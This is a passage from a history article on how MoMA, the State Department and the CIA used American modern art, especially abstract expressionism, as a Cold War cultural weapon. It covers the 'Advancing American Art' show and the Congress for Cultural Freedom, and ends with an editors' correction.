The Museum followed suit. MoMA fulfilled 38 government contracts for cultural materials during the Second World War, and mounted 19 exhibitions of contemporary American painting for the Coordinator’s office, which were exhibited throughout Latin America. (This direct relationship between the avant-garde and the war effort was fitting: the term avant-garde actually began as a French military term describing vanguard troops advancing into battle.)

In the battle for “hearts and minds,” modern art was particularly effective. John Hay Whitney, both a president of MoMA and a member of the Whitney Family, which founded the Whitney Museum of American Art, explained that art stood out as a line of national defense, because it could “educate, inspire, and strengthen the hearts and wills of free men.”

Whitney succeeded Rockefeller as President of the Museum of Modern Art in January 1941, so that Nelson could turn his entire attention to his Coordinator duties. Under Whitney, MoMA served as “A Weapon of National Defense.” According to a Museum press release dated February 28, 1941, MoMA would “inaugurate a new program to speed the interchange of the art and culture of this hemisphere among all the twenty-one American republics.” The goal was “Pan-Americanism.” A “Traveling Art Caravan” through Latin America “would do more to bring us together as friends than ten years of commercial and political work.”

When the War ended, Nelson Rockefeller returned to the Museum, and his Inter-American-Affairs staffers assumed responsibilities for MoMA’s international exhibition program: René d’Harnoncourt, who had headed Inter-American’s art division, became the Museum’s vice president in charge of foreign activities. Fellow staffer Porter McCray became the Director of the Museum’s International Program.

Modern art was so well aligned with American Cold War foreign policy that McCray took a leave of absence from the Museum in 1951 to work on the Marshall Plan. In 1957, Whitney resigned his position as MoMA’s Chairman of the Board of Trustees to become United States Ambassador to Great Britain. Whitney remained a trustee of the Museum while he was Ambassador, and his successor as Chairman was… Nelson Rockefeller, who had served as Special Assistant to President Eisenhower for Foreign Affairs until 1955.

[Image: a Georgia O’Keeffe painting colors the landscape around a model of CIA headquarters]
Even though Modern art and American diplomacy were of a piece, Soviet propaganda asserted that the United States was a “culturally barren” capitalist wasteland. To make the case for American cultural dynamism, the State Department in 1946 spent $49,000 to purchase seventy-nine paintings directly from American Modern artists, and mounted them in a traveling exhibition called “Advancing American Art.” That exhibition, which made stops in Europe and Latin America, included work from artists such as Georgia O’Keeffe and Jacob Lawrence.

Despite positive reviews from Paris to Port-au-Prince, the exhibition stopped short in Czechoslovakia in 1947, because Americans themselves were indignant. Look Magazine fired off an article entitled “Your Money Bought These Paintings.” The Look piece questioned why U.S. tax dollars were being spent on such confusing pieces of art—and wondered whether these paintings were even art. Harry Truman took one look at Yasuo Kuniyoshi’s painting Circus Girl Resting, which was included in the exhibit, and said, “If this is art, I’m a Hottentot.”

In Congress, Republican Representatives John Taber of New York and Fred Busbey of Illinois worried that some of the artists held Communist sympathies, or engaged in “Un-American Activities.”

The American public’s fear of the Red Menace brought “Advancing American Art” home early, but it was precisely because Modern art was not universally popular, and was created by artists who openly disdained orthodoxy, that it was such an effective tool in showcasing the fruits of American cultural freedom to anyone looking in from abroad. President Truman personally considered Modern art “merely the vaporings of half-baked lazy people.” But he did not declare it degenerate and expel its practitioners to gulags in Siberia. Not only that, abstract expressionism in particular was a direct repudiation of Soviet Socialist Realism. Nelson Rockefeller liked to call it “Free Enterprise Painting.”

In contrast to the Soviet Union’s “Popular Front,” the New Yorker magazine wonderfully, and perfectly, referred to the political role of American Modernism as “The Unpopular Front.” The very existence of American Modern Art proved to the world that its creators were free to create, whether you liked their work or not.

If Advancing American Art proved the nation’s artists were free because they could splatter as much paint as they wanted, it also proved that Congress could not always be induced to spend tax dollars supporting it. Braden later wrote, “the idea that Congress would have approved many of our projects was about as likely as the John Birch Society’s approving Medicare.” Clearly the State Department wasn’t the right patron for Modern Art. Which brings us to the CIA.

In 1947, at the very moment that the Advancing American Art show was being recalled, and the United States Government was selling its O’Keeffes for fifty bucks apiece (all seventy-nine pieces in the show together brought in $5,544), the CIA was being created. The CIA grew out of “Wild” Bill Donovan’s Office of Strategic Services (OSS), which was the U.S.’s wartime intelligence apparatus. MoMA’s John Hay Whitney and Thomas W. Braden had both been members of the OSS.

Their fellow operatives included the poet and Librarian of Congress Archibald MacLeish, the historian and public intellectual Arthur M. Schlesinger, Jr., and the Hollywood director John Ford. By the time the CIA was codified in 1947, clandestine affairs had long been the arena of America’s cultural elite. Now, as museum staffers like Braden joined, the cultural cognoscenti and the CIA fought the Cultural Cold War side by side, with the Whitney Trust acting as a funding conduit.

Speaking of front organizations, in 1954, MoMA took over (from the State Department) the U.S. Pavilion at the Venice Biennale, so that the U.S. could continue to exhibit Modern art abroad without appropriating public funds. (MoMA owned the U.S. pavilion at Venice from 1954 to 1962. It was the only national pavilion at the show that was privately owned.)

Eisenhower made MoMA’s role as a government proxy clear in 1954, speaking at the Museum’s twenty-fifth anniversary celebration. Eisenhower called Modern art a “Pillar of Liberty,” saying:

As long as our artists are free to create with sincerity and conviction, there will be healthy controversy and progress in art. How different it is in tyranny. When artists are made the slaves and tools of the state; when artists become the chief propagandists of a cause, progress is arrested and creation and genius are destroyed.

It was MoMA’s job, concurred the United States Ambassador to the Soviet Union, to demonstrate to the rest of the world “both that we have a cultural life and that we care about it.”

The CIA not only helped finance MoMA’s international exhibitions, it made cultural forays across Europe. In 1950, the Agency created the Congress for Cultural Freedom (CCF), headquartered in Paris. Though it appeared to be an “autonomous association of artists, musicians and writers,” it was in fact a CIA funded project to “propagate the virtues of western democratic culture.” The CCF operated for 17 years, and, at its peak, “had offices in thirty-five countries, employed dozens of personnel, published over twenty prestige magazines, held art exhibitions, owned a news and features service, organized high-profile international conferences, and rewarded musicians and artists with prizes and public performances.”

The CIA headquartered the Congress for Cultural Freedom in Paris because that city had long been the capital of European cultural life. The CCF’s main goal was to convince European intellectuals, who might otherwise be swayed by Soviet propaganda painting the U.S. as home only to capitalist philistines, that the opposite was true: with Europe weakened by war, it was now the United States that would protect and nurture the western cultural tradition in the face of Soviet dogma.

Braden, writing about his role in the CCF as director of the CIA’s cultural activities, explained in 1967, “in much of Europe in the 1950’s, socialists, people who called themselves ‘left’—the very people whom many Americans thought no better than Communists—were the only people who gave a damn about fighting Communism.” When the CIA made its bid to the European intelligentsia, the Agency was waging what Braden called “the battle for Picasso’s mind,” via Jackson Pollock’s art.

Accordingly, the CIA bankrolled the Partisan Review, which was the center of the American non-Communist left, carrying enormous cultural prestige in both the U.S. and Europe because of its association with writers like T.S. Eliot and George Orwell. Unsurprisingly, the editor of the Partisan Review was the art critic Clement Greenberg, the most influential arbiter of taste, and the strongest proponent of abstract expressionism in post-war New York.

The CCF worked with MoMA to mount 1952’s “Masterpieces of the Twentieth Century” Festival in Paris. The works for the show came from MoMA’s Collection, and “established the CCF as a major presence in European cultural life,” as the historian Hugh Wilford wrote in his book The Mighty Wurlitzer: How the CIA Played America.

Curator James Johnson Sweeney made sure to note that the works included in the show “could not have been created . . . by such totalitarian regimes as Nazi Germany or present-day Soviet Russia.” Distilling this message even further in 1954, MoMA’s August Heckscher declared that the museum’s work was “related to the central struggle of the age—the struggle of freedom against tyranny.”

Editors’ Note: An earlier version of this article misquoted President Truman. He considered Modern art “merely the vaporings of half-baked lazy people,” not “the vaporizings.” 









Lucie Levine
